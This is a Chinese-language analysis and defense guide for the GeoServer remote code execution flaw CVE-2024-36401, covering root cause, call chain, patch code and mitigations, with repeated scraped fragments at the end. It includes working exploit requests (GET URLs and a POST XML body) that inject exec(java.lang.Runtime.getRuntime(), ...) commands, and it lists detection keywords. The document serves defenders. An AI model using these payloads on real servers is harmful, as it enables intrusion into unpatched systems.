CVE-2024-36401 GeoServer远程代码执行漏洞分析与防护指南<\/h1>

漏洞概述<\/h2>
CVE-2024-36401是GeoServer中存在的一个高危远程代码执行漏洞，源于GeoServer调用的GeoTools库API在处理特性类型属性\/属性名称时存在安全问题。该漏洞允许攻击者通过构造特定的XPath表达式执行任意代码。<\/p>

受影响版本<\/h2>

GeoServer < 2.23.6<\/li>
2.24.0 <= GeoServer < 2.24.4<\/li>

2.25.0 <= GeoServer < 2.25.2<\/li> <\/ul>

漏洞原理<\/h2>

根本原因<\/h3>
GeoTools库API在评估要素类型的特征\/属性名称时，以不安全的方式将属性名称传递给commons-jxpath库。该库在评估XPath表达式时可以执行任意代码。这种XPath评估本意仅用于复杂要素类型（即应用程序模式数据存储），但错误地也被应用于简单要素类型，这使得漏洞适用于所有GeoServer实例。<\/p>

关键问题点<\/h3>

不安全传递<\/strong>：GeoTools将用户可控输入直接传递给commons-jxpath库<\/li>
XPath表达式执行<\/strong>：commons-jxpath库能够解析并执行包含Java方法调用的XPath表达式<\/li>

错误应用范围<\/strong>：本应仅用于复杂要素类型的XPath评估被错误应用于简单要素类型<\/li> <\/ol>
漏洞利用方式<\/h2>
可利用接口<\/h3>
漏洞可通过以下GeoServer服务接口利用：<\/p>

WFS GetFeature<\/li>
WFS GetPropertyValue<\/li>
WMS GetMap<\/li>
WMS GetFeatureInfo<\/li>
WMS GetLegendGraphic<\/li>
WPS Execute<\/li> <\/ol>
具体利用示例<\/h3>
通过WFS GetPropertyValue接口<\/h4>
GET请求方式<\/strong>：<\/p>
http:\/\/[target]\/geoserver\/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch \/tmp\/pwn') <\/code><\/pre> POST请求方式<\/strong>：<\/p> POST \/geoserver\/wfs HTTP\/1.1 <\/span><\/span>Host: 127.0.0.1:8080 <\/span><\/span>Content-Type: text\/xml <\/span><\/span>Content-Length: 329 <\/span><\/span> <\/span><\/span><wfs:GetPropertyValue<\/span> service=<\/span>'WFS'<\/span> version=<\/span>'2.0.0'<\/span> <\/span><\/span>xmlns:topp=<\/span>'http:\/\/www.openplans.org\/topp'<\/span> <\/span><\/span>xmlns:fes=<\/span>'http:\/\/www.opengis.net\/fes\/2.0'<\/span> <\/span><\/span>xmlns:wfs=<\/span>'http:\/\/www.opengis.net\/wfs\/2.0'<\/span> <\/span><\/span>valueReference=<\/span>'exec(java.lang.Runtime.getRuntime(),"touch \/tmp\/pwn")'<\/span>><\/span> <\/span><\/span><wfs:Query<\/span> typeNames=<\/span>'topp:states'<\/span>\/><\/span> <\/span><\/span><\/wfs:GetPropertyValue><\/span> <\/span><\/span><\/code><\/pre>通过WFS GetFeature接口<\/h4> http:\/\/[target]\/geoserver\/wfs?service=wfs&version=2.0.0&request=GetFeature&typeNames=topp:states&featureID=feature&propertyName=exec(java.lang.Runtime.getRuntime(),'touch%20\/tmp\/pwn2') <\/code><\/pre> 漏洞分析<\/h2> 漏洞调用链<\/h3> 入口点<\/strong>：org.geoserver.wfs.GetPropertyValue.run()<\/code><\/li> 参数处理<\/strong>：获取并处理valueReference参数<\/li> XPath评估<\/strong>：调用FeaturePropertyAccessorFactory.FeaturePropertyAccessor.get()<\/code><\/li> 表达式编译<\/strong>：org.apache.commons.jxpath.ri.compiler.Expression.compile()<\/code><\/li> 执行路径<\/strong>： org.apache.commons.jxpath.ri.compiler.LocationPath.compute()<\/code><\/li> org.apache.commons.jxpath.ri.compiler.ExtensionFunction.compute()<\/code><\/li> org.apache.commons.jxpath.Function.invoke()<\/code><\/li> <\/ul> <\/li> <\/ol> 关键代码分析<\/h3> 漏洞触发点<\/strong>：<\/p> \/\/ org.geotools.data.complex.expression.FeaturePropertyAccessorFactory.FeaturePropertyAccessor.get() <\/span><\/span><\/span><\/span>public<\/span> Object get<\/span>(<\/span>Object object,<\/span> String xpath,<\/span> Class<<\/span>T><\/span> target)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> JXPathContext context =<\/span> JXPathContext.<\/span>newContext<\/span>(<\/span>object);<\/span> <\/span><\/span> Iterator iter =<\/span> context.<\/span>iteratePointers<\/span>(<\/span>xpath);<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>危险表达式执行<\/strong>：<\/p> \/\/ org.apache.commons.jxpath.ri.compiler.ExtensionFunction.computeValue() <\/span><\/span><\/span><\/span>public<\/span> Object computeValue<\/span>(<\/span>EvalContext context)<\/span> {<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> return<\/span> function.<\/span>invoke<\/span>(<\/span>context,<\/span> parameters);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>修复方案<\/h2> 官方修复<\/h3> 更新GeoServer<\/strong>：<\/p> 升级到GeoServer 2.23.6或更高版本<\/li> 升级到GeoServer 2.24.4或更高版本<\/li> 升级到GeoServer 2.25.2或更高版本<\/li> <\/ul> <\/li> 更新GeoTools依赖<\/strong>：<\/p> 更新gt-app-schema、gt-complex和gt-xsd-core jar文件<\/li> <\/ul> <\/li> <\/ol> 代码修复<\/h3> GeoTools添加了安全检查newSafeContext<\/code>，例如：<\/p> \/\/ 修复后的FeaturePropertyAccessorFactory.get() <\/span><\/span><\/span><\/span>public<\/span> Object get<\/span>(<\/span>Object object,<\/span> String xpath,<\/span> Class<<\/span>T><\/span> target)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> JXPathContext context =<\/span> JXPathUtils.<\/span>newSafeContext<\/span>(<\/span>object);<\/span> <\/span><\/span> Iterator iter =<\/span> context.<\/span>iteratePointers<\/span>(<\/span>xpath);<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>新增的JXPathUtils<\/code>类禁止通过XPath表达式调用Java方法：<\/p> \/\/ org.geotools.xsd.impl.jxpath.JXPathUtils <\/span><\/span><\/span><\/span>public<\/span> static<\/span> JXPathContext newSafeContext<\/span>(<\/span>Object contextBean)<\/span> {<\/span> <\/span><\/span> JXPathContext context =<\/span> JXPathContext.<\/span>newContext<\/span>(<\/span>contextBean);<\/span> <\/span><\/span> context.<\/span>setLenient<\/span>(<\/span>false<\/span>);<\/span> <\/span><\/span> context.<\/span>setFactory<\/span>(<\/span>new<\/span> SafeJXPathFactory());<\/span> <\/span><\/span> return<\/span> context;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>防护建议<\/h2> 立即升级<\/strong>：所有受影响版本的GeoServer应立即升级到安全版本<\/li> 网络防护<\/strong>：限制对GeoServer管理接口的访问<\/li> 部署WAF规则拦截可疑的XPath表达式<\/li> <\/ul> <\/li> 监控措施<\/strong>：监控日志中异常的WFS\/WMS请求<\/li> 特别关注包含"exec("、"java.lang.Runtime"等关键字的请求<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> GeoServer安全公告<\/a><\/li> GeoTools安全公告<\/a><\/li> GeoTools修复提交<\/a><\/li> 技术分析文章<\/a><\/li> <\/ol>

CVE-2024-36401 GeoServer远程代码执行漏洞分析与防护指南<\/h1>

漏洞概述<\/h2> CVE-2024-36401是GeoServer中存在的一个高危远程代码执行漏洞，源于GeoServer调用的GeoTools库API在处理特性类型属性\/属性名称时存在安全问题。该漏洞允许攻击者通过构造特定的XPath表达式执行任意代码。<\/p>

漏洞原理<\/h2>

漏洞利用方式<\/h2>

具体利用示例<\/h3>

漏洞分析<\/h2>

修复方案<\/h2>

参考资源<\/h2> GeoServer安全公告<\/a><\/li> GeoTools安全公告<\/a><\/li> GeoTools修复提交<\/a><\/li> 技术分析文章<\/a><\/li> <\/ol>

漏洞概述<\/h2>
CVE-2024-36401是GeoServer中存在的一个高危远程代码执行漏洞，源于GeoServer调用的GeoTools库API在处理特性类型属性\/属性名称时存在安全问题。该漏洞允许攻击者通过构造特定的XPath表达式执行任意代码。<\/p>

参考资源<\/h2>

GeoServer安全公告<\/a><\/li>
GeoTools安全公告<\/a><\/li>
GeoTools修复提交<\/a><\/li>
技术分析文章<\/a><\/li> <\/ol>